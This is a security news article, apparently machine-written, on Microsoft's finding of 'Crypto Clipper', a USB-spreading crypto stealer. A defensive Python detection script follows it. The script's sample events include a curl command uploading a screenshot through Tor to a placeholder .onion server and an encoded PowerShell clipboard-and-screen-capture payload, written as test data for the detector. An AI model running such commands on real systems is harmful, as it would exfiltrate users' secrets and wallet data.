Ethical Hacking News

Microsoft Discovers New Lightweight Backdoor that Steals Cryptocurrency: The Rise of Crypto Clipper


Microsoft has discovered a new lightweight backdoor that spreads via USB drives, steals cryptocurrency credentials, and sends them to attacker-controlled servers via Tor. The malware, named Crypto Clipper, combines clipboard targeting, screenshot capture, and remote code execution, and delivers outsized impact when paired with anonymized communications.

  • Crypto Clipper is a new lightweight backdoor malware discovered by Microsoft that spreads through USB drives and steals cryptocurrency credentials.
  • The malware monitors clipboard contents for patterns consistent with wallet addresses or seed phrases, sending the information to attacker-controlled servers via Tor.
  • Crypto Clipper infects .lnk files on a USB drive, which the device then executes; it also scans the infected drive and names its .lnk files to resemble files already present, concealing evidence of the worm.
  • The malware uploads seed phrases and screenshots to the attacker's server and swaps wallet addresses for attacker-controlled ones, diverting payments to the attacker.
  • Microsoft Defender for Endpoint detects Crypto Clipper components as Suspicious JavaScript processes and Possible data exfiltrations using Curl.



Microsoft has recently discovered a new lightweight backdoor that spreads through USB drives and steals cryptocurrency credentials. The malware, named Crypto Clipper, is known for monitoring clipboard contents for patterns consistent with wallet addresses or seed phrases and sending that information to attacker-controlled servers via Tor.

The malware spreads by infecting .lnk files on a USB drive, which the device then executes. The infected code checks whether it already exists on the machine and downloads itself if not. To better conceal evidence of the worm, Crypto Clipper scans the infected USB drive and names its .lnk files to resemble the files already on it.

Crypto Clipper's high-level execution flow involves monitoring clipboard contents for patterns consistent with standardized 12- or 24-word seed phrases. When it finds one, it uploads it along with screenshots to the attacker's server. The stealer also replaces wallet addresses it finds with ones belonging to attacker-controlled wallets, allowing the attacker to divert payments.

The purpose of the screenshots, according to Microsoft, is to provide context that may be useful to the operator. This malware family shows how lightweight, script-based stealers can deliver outsized impact when paired with anonymized communications and runtime tasking. The combination of Tor-routed C2, clipboard targeting, screenshot capture, and remote code execution gives attackers both immediate monetization paths and continued control over compromised devices.

Microsoft Defender for Endpoint detects Crypto Clipper components as Suspicious JavaScript processes and Possible data exfiltrations using Curl. Microsoft Defender Antivirus detects it as Trojan:Win32/CryptoBandits.A. More generically, the strongest indications of infection are script interpreters spawning suspicious child processes, proxy usage on localhost:9050 (Tor's default SOCKS port), screen-capture commands in PowerShell, and signs of clipboard inspection or crypto-address replacement.

This discovery highlights the growing threat of lightweight malware that can deliver significant impact when paired with anonymized communications and runtime tasking. Users should remain vigilant and take the necessary precautions to protect themselves against such threats.
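The generic infection signs above (script interpreters spawning suspicious children, proxy traffic to localhost:9050, PowerShell screen capture, clipboard inspection) can be checked against process-creation telemetry. The following is an added example written for this page; it is not Microsoft's detection logic and not code from the malware or the article. The event schema (parent_image, image, command_line), the sample events, the .onion hostname and the file paths are all constructed placeholders. It also decodes PowerShell's -EncodedCommand payload before matching, so base64 wrapping does not hide the API names.

```python
"""Triage process-creation events for the infection signs the article lists:
script interpreters spawning suspicious children, curl uploads through a SOCKS
proxy on localhost:9050, PowerShell screen capture, and clipboard inspection.
Added example; the event schema and sample events below are constructed."""
import base64
import binascii
import ntpath
import re

SCRIPT_INTERPRETERS = {"wscript.exe", "cscript.exe", "mshta.exe", "node.exe",
                       "powershell.exe", "pwsh.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "curl.exe",
                       "certutil.exe", "bitsadmin.exe", "wscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# localhost:9050 is Tor's default SOCKS port; curl reaches it via -x/--proxy.
TOR_PROXY_RE = re.compile(r"(?:socks5h?://)?(?:127\.0\.0\.1|localhost):9050\b", re.I)
# curl flags that send a body or file (case matters: -F is form upload, -f is --fail).
CURL_UPLOAD_RE = re.compile(r"(?:^|\s)(?:-F|-d|--data(?:-binary|-raw)?|-T|--upload-file)(?:\s|=)")
# .NET members a PowerShell screen grab relies on (System.Drawing / System.Windows.Forms).
SCREEN_CAPTURE_RE = re.compile(r"copyfromscreen|primaryscreen|system\.drawing\.bitmap", re.I)
# Clipboard reads/writes, cmdlet style or .NET style.
CLIPBOARD_RE = re.compile(r"get-clipboard|set-clipboard|clipboard\]?(?:::|\.)(?:gettext|settext)", re.I)
# PowerShell -EncodedCommand (and its abbreviations) takes base64 of a UTF-16LE script.
ENCODED_FLAG_RE = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_powershell(script: str) -> str:
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmd: str) -> str:
    """Return the decoded -EncodedCommand payload, or "" if absent or undecodable."""
    m = ENCODED_FLAG_RE.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return ""


def indicators(event: dict) -> list:
    """Name every article-listed infection sign this single event exhibits."""
    parent = ntpath.basename(event.get("parent_image", "")).lower()
    image = ntpath.basename(event.get("image", "")).lower()
    cmd = event.get("command_line", "")
    # Match against the visible command line plus any decoded encoded payload.
    text = cmd + "\n" + decode_encoded_command(cmd)
    hits = []
    if parent in SCRIPT_INTERPRETERS and image in SUSPICIOUS_CHILDREN:
        hits.append("script_interpreter_child")
    if TOR_PROXY_RE.search(text):
        hits.append("tor_socks_proxy")
        if image == "curl.exe" and CURL_UPLOAD_RE.search(text):
            hits.append("curl_upload_via_tor")
    if SCREEN_CAPTURE_RE.search(text):
        hits.append("powershell_screen_capture" if image in POWERSHELL else "screen_capture")
    if CLIPBOARD_RE.search(text):
        hits.append("clipboard_access")
    return hits


def triage(events) -> list:
    """Return {"id", "indicators"} for each event with at least one hit."""
    out = []
    for ev in events:
        hits = indicators(ev)
        if hits:
            out.append({"id": ev["id"], "indicators": hits})
    return out


# Constructed sample telemetry (not real IoCs); hostnames and paths are placeholders.
_HIDDEN_SCRIPT = ("[System.Windows.Forms.Clipboard]::GetText(); "
                  "$g.CopyFromScreen(0, 0, 0, 0, $bmp.Size)")
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Date"},
    {"id": 2, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "command_line": (r'curl.exe -x socks5h://127.0.0.1:9050 -F "file=@C:\Users\alice\AppData\Local\Temp\shot.png" '
                      "http://c2-placeholder.onion/upload")},
    {"id": 3, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -enc " + encode_powershell(_HIDDEN_SCRIPT)},
    {"id": 4, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "command_line": "curl.exe -sS https://updates.example.com/health"},
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row)
```

Events 1 and 4 are benign controls (an interactive shell and a scripted health check) and produce no hits; event 2 trips all three of the script-child, Tor-proxy and curl-upload checks, and event 3 is only caught because the encoded PowerShell payload is decoded before the screen-capture and clipboard patterns are applied. In a real deployment the regexes would be tuned against the organisation's own baseline, since a legitimate Tor client or a clipboard-manager script would match the individual patterns too; the combination with a script-interpreter parent is what raises the confidence.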

    Related Information:
  • https://www.ethicalhackingnews.com/articles/Microsoft-Discovers-New-Lightweight-Backdoor-that-Steals-Cryptocurrency-The-Rise-of-Crypto-Clipper-ehn.shtml

  • https://arstechnica.com/security/2026/06/microsoft-spots-new-self-propagating-malware-for-stealing-cryptocurrency/


  • Published: Thu Jun 18 20:53:50 2026 by llama3.2 3B Q4_K_M
